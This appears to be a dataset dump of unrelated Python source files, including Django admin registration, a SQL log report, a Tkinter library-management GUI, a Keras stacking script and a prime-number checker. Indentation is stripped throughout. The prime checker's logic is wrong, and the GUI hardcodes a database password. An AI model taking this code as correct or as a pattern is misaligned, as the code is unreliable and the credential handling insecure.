18,310 | b4e816bf8d1446d17ed5d217288454bc3fb5ccb0 | from django.contrib import admin
from .models import Registro
from .models import Cita
# Register your models here.
admin.site.register(Cita)
admin.site.register(Registro)
|
18,311 | 2da493803f796804310cebdad9d32bf4df2c251a | #!/usr/bin/env python3
import psycopg2
# Connect to news database
DBNAME = "news"
db = psycopg2.connect(database=DBNAME)
c = db.cursor()
# 3 most popular articles of all time (title, number of views)
top_article_query = '''
select title, views
from articles join adjusted_logs on (articles.slug = adjusted_logs.FixPath)
group by title, views
order by views desc
limit 3
'''
c.execute(top_article_query)
article_results = c.fetchall()
# For loop to have results print in plain text
print(' ')
print('Here are the top three articles')
print('--------------------------------')
print(' ')
for title, views in article_results:
print('"{}" - {} views.'.format(title, views))
# Who are the most popular article authors of all
# time (author name, number of views)
print(' ')
print('Here are the top three authors')
print('--------------------------------')
print(' ')
top_author_query = '''
select authors.name, sum(adjusted_logs.views) as TotalViews
from articles
join adjusted_logs on (articles.slug = adjusted_logs.FixPath)
join authors on (authors.id = articles.author)
group by authors.name
order by TotalViews desc
limit 3
'''
c.execute(top_author_query)
author_results = c.fetchall()
for author, views in author_results:
print('{} - {} views.'.format(author, views))
# On which days did more than 1% of requests lead to errors (date, % of errors)
error_query = '''
select FailRate.FailDate,
ROUND(((FailRate.NumFail::decimal / TAccess.TCount::decimal) * 100), 2)
from (
select time::date as Date, count(status) as TCount
from log
group by Date
) as TAccess join (
select time::date as FailDate, status, count(status) as NumFail
from log
where status = '404 NOT FOUND'
group by FailDate, status
) as FailRate on TAccess.Date = FailRate.FailDate
where ((FailRate.NumFail::decimal / TAccess.TCount::decimal) * 100) > 1
group by FailRate.FailDate, FailRate.NumFail, TAccess.TCount
'''
c.execute(error_query)
error_results = c.fetchall()
print(' ')
print('Here are the days where there were more that 1% errors')
print('-----------------------------------------------------')
print(' ')
for date, percentage in error_results:
print('{} - {}% errors '.format(date, percentage))
db.close()
|
18,312 | 7943351a490f6d3a9033328187cf2c9ed5b0a177 | from test.basetestcase import TestCase
from pagerank import get_page_rank_scores
class PageRankTestCase(TestCase):
def test_get_page_rank_scores(self):
result = get_page_rank_scores([(1, 2), (2, 4), (4, 3)])
self.assertEqual(result, {
1: 0.05000000000000001,
2: 0.092500000000000027,
4: 0.12862500000000002,
})
result = get_page_rank_scores(
[(1, 2), (2, 4), (4, 3), (3, 1), (3, 2)],
)
self.assertEqual(result, {
1: 0.15667918572028511,
2: 0.28985649358252741,
3: 0.2791899914185817,
4: 0.2838780195451483,
})
|
18,313 | c2e98701b26525d315de2925cc55358095d6b264 | from models.models import (user_chooses_copy_or_move,
get_source_and_target_directories,
action_all_files_or_specified,
perform_move_or_copy)
# asks the user whether wants to copy or move the files
copy_or_move_choice = user_chooses_copy_or_move()
# returns tuple of directories: (src, tgt)
src_and_tgt_dirs = get_source_and_target_directories(copy_or_move=copy_or_move_choice)
# asks whether to action on all files in the dir or just specific files
all_or_list = action_all_files_or_specified()
if all_or_list == 'l':
# TODO: Implement checks on the txt file, kind of the point of the whole thing.
# TODO: Clean this up, it looks dreadful
print(f"\nDue to time constraints, it was not coded in to ensure the list_of_files.txt file exists or is populated")
print("If it's not present, since you selected 'l' it will not throw an error to you but it will just do nothing")
print(f"If it's not there then create list_of_files.txt where app.py exists"
f" and populate it with target filenames on each row, such as")
for n in range(3):
print(f"target_filename_{n}.extension")
print("\n!Make sure you have included the file extensions!")
list_of_files = []
with open('list_of_files.txt', 'r', encoding='utf-8-sig') as txtfile:
for line in txtfile.readlines():
list_of_files.append(line.replace('\n', ''))
print(f"Files in text file are: {list_of_files}")
perform_move_or_copy(move_or_copy=copy_or_move_choice,
src=src_and_tgt_dirs[0],
tgt=src_and_tgt_dirs[1],
list_of_files=list_of_files)
elif all_or_list == 'a':
# re-formatting from c or m for use in f string literals later on
if copy_or_move_choice == 'c':
print_choice = 'copy'
elif copy_or_move_choice == 'm':
print_choice = 'move'
print(f"{print_choice}ing all files from source to target directory")
perform_move_or_copy(move_or_copy=copy_or_move_choice,
src=src_and_tgt_dirs[0],
tgt=src_and_tgt_dirs[1],
list_of_files=None)
|
18,314 | 662e617866ab16c19b5998e566de1d32b782156e | from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from PIL import Image, ImageTk
import pymysql
from tkinter.filedialog import askopenfile
import csv
class librarian_page:
def __init__(self, root):
self.root = root
self.root.title("Library Management System - Librarian's Panel")
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
#self.root.geometry('800x500+0+0')
self.root.geometry(f'{screen_width}x{screen_height}+0+0')
self.root.state('zoomed')
self.root.config(bg='#EBF5FB')
self.img= (Image.open("images\lms.png"))
img_x, img_y = screen_width, screen_height - 50
#img_x, img_y = 600, 400
self.resized_image= self.img.resize((img_x, img_y), Image.ANTIALIAS)
self.new_image= ImageTk.PhotoImage(self.resized_image)
self.img_label = Label(self.root, image=self.new_image).place(x=0, y=0, relwidth=1, relheight=1)
frame1 = Frame(self.root, bg='#EBF5FB')
frame1.place(x=40, y=40, width=img_x-60, height=img_y-80)
title = Label(self.root, text='LIBRARIAN CONTROL PANEL', font=('Goudy old style', 20, 'bold',), bg='lightgray', fg='#088da5').place(x=450, y=20)
############################################################################################
############ BOOKS PANEL ################################################################
############################################################################################
frame2 = Frame(frame1, bg='lightgray')
frame2.place(x=60, y=50, width=800, height=380)
user_title = Label(frame1, text='BOOKS PANEL', font=('Goudy old style', 15, 'bold',),
bg='blue', fg='white').place(x=70, y=40)
button1 = Button(frame2, text='Add a Book', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', command=self.add_book).place(x=10, y=340)
button2 = Button(frame2, text='Edit a Book', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5').place(x=120, y=340)
button3 = Button(frame2, text='Delete a Book', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', command=self.delete_user_table).place(x=230, y=340)
button4 = Button(frame2, text='Advance Search', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5').place(x=350, y=340)
button5 = Button(frame2, text='Import Books', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', command=lambda:self.import_books()).place(x=480, y=340)
button6 = Button(frame2, text='Export Books', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5').place(x=600, y=340)
button7 = Button(frame2, text='R', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', command=self.fetch_user_table).place(x=720, y=340)
frame2_sub = Frame(frame2, bd=4, relief=RIDGE, bg='white')
frame2_sub.place(x=10, y=20, width=770, height=270)
user_columns = ['SN', 'BOOK TITLE', 'BOOK CODE', 'TOTAL QTY', 'AVAILABLE QTY', 'DESCRIPTION',
'AUTHOR', 'PUBLISHER', 'PRICE', 'CATEGORY', 'SUB_CATEGORY', 'CLASS', 'STREAM']
scroll_x = Scrollbar(frame2_sub, orient=HORIZONTAL)
scroll_y = Scrollbar(frame2_sub, orient=VERTICAL)
self.user_table = ttk.Treeview(frame2_sub, columns=user_columns, xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set)
scroll_x.pack(side=BOTTOM, fill=X)
scroll_y.pack(side=RIGHT, fill=Y)
scroll_x.config(command=self.user_table.xview)
scroll_y.config(command=self.user_table.yview)
self.user_table.heading('SN', text='SL NO')
self.user_table.heading('BOOK TITLE', text='TITLE OF THE BOOK')
self.user_table.heading('BOOK CODE', text='BOOK ID/CODE')
self.user_table.heading('TOTAL QTY', text='TOTAL QTY')
self.user_table.heading('AVAILABLE QTY', text='AVAILABLE QTY')
self.user_table.heading('DESCRIPTION', text='DESCRIPTION')
self.user_table.heading('AUTHOR', text='AUTHOR')
self.user_table.heading('PUBLISHER', text='PUBLISHER')
self.user_table.heading('PRICE', text='PRICE')
self.user_table.heading('CATEGORY', text='CATEGORY')
self.user_table.heading('SUB_CATEGORY', text='SUB CATEGORY')
self.user_table.heading('CLASS', text='CLASS')
self.user_table.heading('STREAM', text='STREAM')
self.user_table['show'] = 'headings'
self.user_table.column('SN', width=50)
self.user_table.column('BOOK TITLE', width=150)
self.user_table.column('BOOK CODE', width=100)
self.user_table.column('TOTAL QTY', width=80)
self.user_table.column('AVAILABLE QTY', width=80)
self.user_table.column('DESCRIPTION', width=100)
self.user_table.column('AUTHOR', width=150)
self.user_table.column('PUBLISHER', width=100)
self.user_table.column('PRICE', width=100)
self.user_table.column('CATEGORY', width=100)
self.user_table.column('SUB_CATEGORY', width=100)
self.user_table.column('CLASS', width=100)
self.user_table.column('STREAM', width=100)
self.user_table.pack(fill=BOTH, expand=1)
self.fetch_user_table()
frame2_sub2 = Frame(frame2, bg='#EBF5FB')
frame2_sub2.place(x=10, y=290, width=770, height=40)
frame2_sub2_title = Label(frame2_sub2 , text='Enter Book ID/CODE :', font=('Goudy old style', 13),
bg='#EBF5FB', fg='#088da5').place(x=5, y=5)
frame2_sub2_entry = Entry(frame2_sub2 , text='', font=('Goudy old style', 13),
bg='white', width=12).place(x=175, y=5)
frame2_sub2_button = Button(frame2_sub2, text='Search', font=('Goudy old style', 12, 'bold'),
bg='#EBF5FB', fg='#088da5', width=8, height=1 ).place(x=290, y=1)
frame2_sub2_title2 = Label(frame2_sub2 , text='Enter Book Title :', font=('Goudy old style', 13),
bg='#EBF5FB', fg='#088da5').place(x=380, y=5)
frame2_sub2_entry2 = Entry(frame2_sub2 , text='', font=('Goudy old style', 13),
bg='white', width=18).place(x=505, y=5)
frame2_sub2_button2 = Button(frame2_sub2, text='Search', font=('Goudy old style', 12, 'bold'),
bg='#EBF5FB', fg='#088da5', width=8, height=1 ).place(x=675, y=1)
###########################################################################################################
###################### LIBRARY STATISTICS #################################################################
###########################################################################################################
self.no_of_books()
frame4 = Frame(frame1, bg='lightgray')
frame4.place(x=880, y=50, width=390, height=500)
frame4_sub = Frame(frame4, bd=4, relief=RIDGE, bg='white')
frame4_sub.place(x=10, y=20, width=360, height=470)
view_title = Label(frame1, text='LIBRARY STATISTICS', font=('Goudy old style', 15, 'bold',),
bg='blue', fg='white').place(x=890, y=40)
total_books = Label(frame4_sub, text='Total Nos of Books', font=('Goudy old style', 15, 'bold',),
bg='#EBF5FB', fg='#088da5').place(x=100, y=20)
tbc = Label(frame4_sub, text="00"+str(self.total_no_of_books), font=('Goudy old style', 15, 'bold',),
bg='white', fg='blue').place(x=140, y=60)
issued_books = Label(frame4_sub, text='Nos of Books Issued', font=('Goudy old style', 15, 'bold',),
bg='#EBF5FB', fg='#088da5').place(x=100, y=100)
ibc = Label(frame4_sub, text="00"+str(self.total_books_issued), font=('Goudy old style', 15, 'bold',),
bg='white', fg='green').place(x=140, y=140)
overdue_books = Label(frame4_sub, text='Overdue Books to Return', font=('Goudy old style', 15, 'bold',),
bg='#EBF5FB', fg='#088da5').place(x=80, y=180)
obc = Label(frame4_sub, text='0085', font=('Goudy old style', 15, 'bold',),
bg='white', fg='red').place(x=150, y=220)
ubn = Label(frame4_sub, text='Total Unique Books', font=('Goudy old style', 15, 'bold',),
bg='#EBF5FB', fg='#088da5').place(x=100, y=260)
ubn2 = Label(frame4_sub, text="00"+str(self.total_unique_books), font=('Goudy old style', 15, 'bold',),
bg='white', fg='red').place(x=150, y=300)
###########################################################################################################
###################### BOOK ISSUE and SUB-PANELS###########################################################
###########################################################################################################
frame5 = Frame(frame1, bg='lightgray')
frame5.place(x=60, y=450, width=200, height=160)
button1_f5 = Button(frame5, text='Issue Book', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=10)
button2_f5 = Button(frame5, text='Retreive Book', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=60)
button3_f5 = Button(frame5, text='Overdue Books', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=110)
frame6 = Frame(frame1, bg='lightgray')
frame6.place(x=300, y=450, width=200, height=160)
button1_f6 = Button(frame6, text='Book Categories', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=10)
button2_f6 = Button(frame6, text='Authors', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=60)
button3_f6 = Button(frame6, text='Publishers', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=110)
frame7 = Frame(frame1, bg='lightgray')
frame7.place(x=540, y=450, width=200, height=160)
button1_f7 = Button(frame7, text='Notifications', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=10)
button2_f7 = Button(frame7, text='Fines', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=60)
button3_f7 = Button(frame7, text='Students', font=('Goudy old style', 13, 'bold'),
bg='white', fg='#088da5', width=12).place(x=20, y=110)
############################################################################################################
######################################## FUNCTIONS ###################################################
############################################################################################################
def add_book(self):
self.t = Toplevel(self.root)
self.t.title('Libray Management System')
self.t.geometry('780x600+200+30')
self.t.config(bg='lightgray')
ab_frame1 = Frame(self.t, bg='#EBF5FB')
ab_frame1.place(x=20, y=20, width=360, height=520)
title = Label(self.t, text='ADD BOOK', font=('Goudy old style', 16, 'bold'), bg='white', fg='#088da5').place(x=140, y=4)
save_button = Button(self.t, text='Save', width=10, command=self.save_button, font=('Goudy old style', 13, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=520, y=550)
cancel_button = Button(self.t, text='Cancel', width=10, command=self.self_close, font=('Goudy old style', 13, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=640, y=550)
title = Label(ab_frame1, text='Title of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=25)
self.text_first_name = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
self.text_first_name.place(x=20, y=55)
title = Label(ab_frame1, text='Book Code/ID', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=85)
self.text_last_name = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
self.text_last_name.place(x=20, y=115)
title = Label(ab_frame1, text='Description', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=145)
self.text_password = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
self.text_password.place(x=20, y=175)
title = Label(ab_frame1, text='Author of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=205)
self.text_password = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
self.text_password.place(x=20, y=235)
title = Label(ab_frame1, text='Publisher Name', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=265)
self.text_contact = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=35, borderwidth=2)
self.text_contact.place(x=20, y=295)
title = Label(ab_frame1, text='Price', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=325)
self.text_email = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=15, borderwidth=2)
self.text_email.place(x=20, y=355)
title = Label(ab_frame1, text='Quantity', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=200, y=325)
self.text_email = Entry(ab_frame1, font=('times new roman', 13), bg='white', width=15, borderwidth=2)
self.text_email.place(x=200, y=355)
user_type = Label(ab_frame1, text='Category of the Book', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=385)
self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly')
self.user_type_q['value'] = ("Select", 'Arts', 'Science', 'Commerce', 'Vocational')
self.user_type_q.place(x=20, y=415)
self.user_type_q.current(0)
user_type = Label(ab_frame1, text='Class', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=20, y=445)
self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly', width=12)
self.user_type_q['value'] = ("Select", '+2', '+3', 'P.G.', 'BCA', 'MCA')
self.user_type_q.place(x=20, y=475)
self.user_type_q.current(0)
user_type = Label(ab_frame1, text='Stream', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=190, y=445)
self.user_type_q = ttk.Combobox(ab_frame1, font=('Goudy old style', 15), state='readonly', width=12)
self.user_type_q['value'] = ("Select", 'Arts', 'Science', 'Commerce', 'Vocational')
self.user_type_q.place(x=190, y=475)
self.user_type_q.current(0)
ab_frame2 = Frame(self.t, bg='#EBF5FB')
ab_frame2.place(x=400, y=20, width=360, height=520)
title = Label(ab_frame2, text='*PICTURE OF THE BOOK*', font=('Goudy old style', 12, 'bold'), bg='#EBF5FB', fg='#088da5').place(x=70, y=25)
button1 = Button(ab_frame2, text='<<', width=3, font=('Goudy old style', 13, 'bold'),bd=0, bg='#EBF5FB', fg='#088da5').place(x=10, y=200)
button2 = Button(ab_frame2, text='>>', width=3, font=('Goudy old style', 13, 'bold'),bd=0, bg='#EBF5FB', fg='#088da5').place(x=310, y=200)
self.frame2_sub = Frame(ab_frame2, bd=3, relief=RIDGE, bg='#EBF5FB')
self.frame2_sub.place(x=45, y=50, width=265, height=370)
ab_btn = Button(ab_frame2, text ='Browse', width=8, command = lambda:self.open_file()).place(x=260, y=440)
btn_title = Label(ab_frame2, text='File:', font=('Goudy old style', 13, 'bold'), bg='#EBF5FB',
fg='#088da5').place(x=40, y=440)
self.ab_btn_entry = Entry(ab_frame2, font=('times new roman', 13), bg='white', width=20, borderwidth=2)
self.ab_btn_entry.place(x=80, y=440)
def self_close(self):
self.t.destroy()
def open_file(self):
book_img_file = askopenfile(mode ='r', filetypes =[('Image Files', ['*.jpg','*.png', '*.gif',])])
if book_img_file is not None:
print(book_img_file.name)
self.ab_btn_entry.delete(0, END)
self.ab_btn_entry.insert(0, book_img_file.name)
self.book_img= (Image.open(book_img_file.name))
book_img_width, book_img_height = self.book_img.size
x = book_img_width/220
y = book_img_height/x
img_x, img_y = 220, int(y)
self.resized_book_image= self.book_img.resize((img_x, img_y), Image.ANTIALIAS)
self.new_book_image= ImageTk.PhotoImage(self.resized_book_image)
self.book_img_label = Label(self.frame2_sub, image=self.new_book_image).place(x=0, y=0, relwidth=1, relheight=1)
messagebox.showinfo("Success", "Image has been successfully imported", parent=self.t)
else:
messagebox.showerror("Error", "No file has been selected", parent=self.t)
def save_button(self):
messagebox.showerror("Hello", "You clicked save button", parent=self.root)
def import_books(self):
ib_user_columns = ['SN', 'BOOK TITLE', 'BOOK CODE', 'TOTAL QTY', 'AVAILABLE QTY', 'DESCRIPTION',
'AUTHOR', 'PUBLISHER', 'PRICE', 'CATEGORY', 'SUB_CATEGORY', 'CLASS', 'STREAM']
self.ib = Toplevel(self.root)
self.ib.title('Import CSV file')
self.ib.geometry('800x350+200+30')
self.ib.config(bg='lightgray')
ib_title = Label(self.ib, text='Preview of the File:', font=('Goudy old style', 16, 'bold'), bg='#EBF5FB',
fg='#088da5').place(x=10, y=10)
ib_frame2_sub = Frame(self.ib, bd=4, relief=RIDGE, bg='white')
ib_frame2_sub.place(x=10, y=40, width=770, height=250)
ib_scroll_x = Scrollbar(ib_frame2_sub, orient=HORIZONTAL)
ib_scroll_y = Scrollbar(ib_frame2_sub, orient=VERTICAL)
ib_user_table = ttk.Treeview(ib_frame2_sub, columns=ib_user_columns, xscrollcommand=ib_scroll_x.set, yscrollcommand=ib_scroll_y.set)
ib_scroll_x.pack(side=BOTTOM, fill=X)
ib_scroll_y.pack(side=RIGHT, fill=Y)
ib_scroll_x.config(command=ib_user_table.xview)
ib_scroll_y.config(command=ib_user_table.yview)
ib_user_table.heading('SN', text='SL NO')
ib_user_table.heading('BOOK TITLE', text='TITLE OF THE BOOK')
ib_user_table.heading('BOOK CODE', text='BOOK ID/CODE')
ib_user_table.heading('TOTAL QTY', text='TOTAL QTY')
ib_user_table.heading('AVAILABLE QTY', text='AVAILABLE QTY')
ib_user_table.heading('DESCRIPTION', text='DESCRIPTION')
ib_user_table.heading('AUTHOR', text='AUTHOR')
ib_user_table.heading('PUBLISHER', text='PUBLISHER')
ib_user_table.heading('PRICE', text='PRICE')
ib_user_table.heading('CATEGORY', text='CATEGORY')
ib_user_table.heading('SUB_CATEGORY', text='SUB CATEGORY')
ib_user_table.heading('CLASS', text='CLASS')
ib_user_table.heading('STREAM', text='STREAM')
ib_user_table['show'] = 'headings'
ib_user_table.column('SN', width=50)
ib_user_table.column('BOOK TITLE', width=150)
ib_user_table.column('BOOK CODE', width=100)
ib_user_table.column('TOTAL QTY', width=80)
ib_user_table.column('AVAILABLE QTY', width=80)
ib_user_table.column('DESCRIPTION', width=100)
ib_user_table.column('AUTHOR', width=150)
ib_user_table.column('PUBLISHER', width=100)
ib_user_table.column('PRICE', width=100)
ib_user_table.column('CATEGORY', width=100)
ib_user_table.column('SUB_CATEGORY', width=100)
ib_user_table.column('CLASS', width=100)
ib_user_table.column('STREAM', width=100)
ib_user_table.pack(fill=BOTH, expand=1)
btn_ib_frame2_sub2 = Button(self.ib, text='Import', font=('Goudy old style', 12, 'bold'),
bg='#EBF5FB', fg='#088da5', width=8, height=1, command=self.import_to_db).place(x=575, y=300)
btn2_ib_frame2_sub2 = Button(self.ib, text='Cancel', font=('Goudy old style', 12, 'bold'),
bg='#EBF5FB', fg='#088da5', width=8, height=1, command=self.close_ib).place(x=675, y=300)
self.rows = []
book_csv_file = askopenfile(mode ='r', filetypes =[('csv files', ['*.csv'])])
if book_csv_file is not None:
with open(book_csv_file.name, 'r') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
self.rows.append(row)
if self.rows[0] != ib_user_columns:
messagebox.showerror("Error", "This file can be Imported", parent=self.ib)
else:
for row in self.rows[1:]:
ib_user_table.insert('', END, values=row)
messagebox.showinfo("Success", "please check the data before Import", parent=self.ib)
def import_to_db(self):
mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
mycursor = mydb.cursor()
mycursor.execute("select COUNT(*) from books")
for x in mycursor:
sl_no = x[0]
sl_no_add = int(int(sl_no) + 1)
sl_no_addc = sl_no_add
#for i in range(len(self.rows[1:])):
for i in range(len(self.rows[1:])):
mycursor.execute("select * from books where book_id=%s ",(self.rows[1:][i][2]))
row_db = mycursor.fetchone()
if row_db!=None:
messagebox.showerror("Error", f"Entry already exist:\n Book Title - {self.rows[1:][i][1]}\n Book Code - {self.rows[1:][i][2]}", parent=self.ib)
elif row_db==None:
row = self.rows[1:][i]
val = (sl_no_addc,row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12])
sql = "INSERT INTO books (sl_no, book_title, book_id, total_qty, available_qty, descr, author, publisher, price,category,sub_category,class,stream) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
mycursor.execute(sql, val)
mydb.commit()
sl_no_addc = sl_no_addc + 1
else:
pass
#if mycursor.rowcount == 1:
#messagebox.showinfo("Success", "User saved successfully", parent=self.t)
mycursor.execute("select COUNT(*) from books")
for x in mycursor:
sl_no_new = x[0]
sl_no_add_new = int(int(sl_no_new) + 1)
added_books = sl_no_add_new - sl_no_add
messagebox.showinfo("Success", f"No of Books added successfully: {added_books}", parent=self.ib)
mycursor.close()
#self.fetch_user_table()
mydb.close()
print(sl_no_add)
def close_ib(self):
self.ib.destroy()
def fetch_user_table(self):
mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
mycursor = mydb.cursor()
mycursor.execute("select * from books")
rows = mycursor.fetchall()
if len(rows)!=0:
self.user_table.delete(*self.user_table.get_children())
for row in rows:
self.user_table.insert('', END, values=row)
mydb.commit()
if len(rows)==0:
self.user_table.delete(*self.user_table.get_children())
mycursor.close()
mydb.close()
def delete_user_table(self):
cursor_row = self.user_table.focus()
contents = self.user_table.item(cursor_row)
row = contents["values"]
mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
mycursor = mydb.cursor()
mycursor.execute("delete from books where book_id=%s ",(row[2]))
mydb.commit()
mycursor.close()
mydb.close()
self.fetch_user_table()
def no_of_books(self):
mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
mycursor = mydb.cursor()
mycursor.execute("select COUNT(*) from books")
for x in mycursor:
self.total_unique_books = x[0]
mycursor.execute("SELECT total_qty FROM books")
myresult = mycursor.fetchall()
self.total_no_of_books = 0
for x in myresult:
self.total_no_of_books = self.total_no_of_books + x[0]
mycursor.execute("SELECT available_qty FROM books")
myresult2 = mycursor.fetchall()
self.total_available_books = 0
for x in myresult2:
self.total_available_books = self.total_available_books + x[0]
self.total_books_issued = self.total_no_of_books - self.total_available_books
root = Tk()
obj = librarian_page(root)
root.mainloop()
|
18,315 | 35df271c6fbf01ca2ca819306080a05018473127 | """Spearman's Rank Correlation Coefficient"""
import typing
import numpy as np
import scipy
from h2oaicore.metrics import CustomScorer
class Spearman_Correlation(CustomScorer):
_description = "Spearman's Rank Correlation Coefficient"
_regression = True
_maximize = True
_perfect_score = 1.
_supports_sample_weight = False
_display_name = "SpearmanR"
def score(self,
actual: np.array,
predicted: np.array,
sample_weight: typing.Optional[np.array] = None,
labels: typing.Optional[np.array] = None) -> float:
if sample_weight is None:
sample_weight = np.ones(actual.shape[0])
# Spearman's Rank Correlation
return scipy.stats.spearmanr(actual, predicted)[0]
|
18,316 | e81f3758d21f8b84590fec045cab2a627aeec128 | import numpy as np
import pandas as pd
from sklearn.metrics import log_loss
from sklearn.model_selection import StratifiedKFold, train_test_split
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils.np_utils import to_categorical
from keras.layers.advanced_activations import PReLU
import os
import model_set
features_location='./features/'
layer1_train_output_location = './layer1_train_output/'
layer1_test_output_location = './layer1_test_output/'
stacking_output_location = '../output/'
data='../input/'
def build_model(input_size):
model = Sequential()
model.add(Dense(88, input_dim= input_size, init='glorot_uniform', activation='relu'))
model.add(Dense(44, input_dim= input_size, init='glorot_uniform', activation='tanh'))
model.add(Dense(22, init='glorot_uniform', activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='Adam')
return model
stack = []
for file in os.listdir(layer1_train_output_location):
if file.endswith(".npy"):
temp = np.load(layer1_train_output_location + file)
#temp = np.loadtxt(layer1_train_output_location + file, delimiter=',')
stack.append(temp)
test_stack = []
for file in os.listdir(layer1_test_output_location):
if file.endswith(".npy"):
temp = np.load(layer1_test_output_location + file)
test_stack.append(temp)
train_stacked = np.hstack(stack)
test_stacked = np.hstack(test_stack)
nb_input = train_stacked.shape[1]
del stack, test_stack
number_of_folds = 5
number_of_bagging = 1
y = pd.read_csv(features_location+'y_train.csv',header=None)
y = y.iloc[:,0]
#y = y['sex-age'][0:10000]
bag_of_predictions = np.zeros((test_stacked.shape[0], 22))
for j in range(number_of_bagging):
#for j in range(1):
print '------------- bagging round %d ------------' % j
skf = StratifiedKFold(n_splits= number_of_folds ,shuffle=True)
y_dummy = to_categorical(y.tolist())
train_predict_y = np.zeros((len(y), 22))
test_predict_y = np.zeros((test_stacked.shape[0], 22))
test_predict_list = []
for i, (train_idx, val_idx) in enumerate(skf.split(train_stacked,y)):
print '------------- fold round %d ------------' % i
#model = build_model(features)
model=model_set.model_set.nn_3layer_for_stacking(nb_input,22,88,44)
model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=6, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
# model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=14, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
#model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=1, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
scoring = model.predict_proba(train_stacked[val_idx])
train_predict_y[val_idx] = scoring
l_score = log_loss(y[val_idx], scoring)
print ' Fold %d loss: %f' % (i, l_score)
tresult = model.predict_proba(test_stacked)
test_predict_y = test_predict_y + tresult
l_score = log_loss(y, train_predict_y)
print 'Final Fold loss: %f' % (l_score)
test_predict_y = test_predict_y / number_of_folds
bag_of_predictions = bag_of_predictions + test_predict_y
bag_of_predictions = bag_of_predictions / number_of_bagging
filename = 'fred_predict_v11.csv'
filename=stacking_output_location + filename
classes_=['1-0','1-1','1-2','1-3','1-4','1-5','1-6','1-7','1-8','1-9','1-10','2-0','2-1','2-2','2-3','2-4','2-5','2-6','2-7','2-8','2-9','2-10']
test = pd.read_csv(data+"deviceid_test.tsv", index_col=0,encoding='utf8', sep='\t',header=None)
output = pd.DataFrame(bag_of_predictions, index = test.index[0:bag_of_predictions.shape[0]], columns=classes_)
output.index.name='DeviceID'
output.to_csv(filename,encoding='utf-8',header=True,index=True)
|
18,317 | 26bf434ff0d9dc8d1f77906cde86b3d96920be20 | def primeNumberchecker(num):
number = int(num)
if number > 1:
for i in range(2,number//2):
if number % i == 0:
print("This is not a Prime Number.")
break
else:
print("This is a Prime number.")
break
else:
print("This is not a Prime number.")
primeNumberchecker(input("Check This Number :")) |
18,318 | 44ba5df48cae566027a5dff86c8ffc2a9fa9c969 | """
This module implements a generic document classification based on
pyConTextNLP markup
"""
from . import utils
from . import schema
"""
def modify_categories(document, category_rules):
for cr in category_rules:
utils.anatomy_recategorize(g,t,cr)
"""
def classify_result(doc_rslts, _schema):
"""
given results in doc_rslts compare to classification_schema and
return score.
Takes a three-tuple of boolean values for
* Disease State Positive
* Disease State Certain
* Disease State Acute
"""
return schema.assign_schema(doc_rslts, _schema)
def classify_document_targets(doc,
classification_rules,
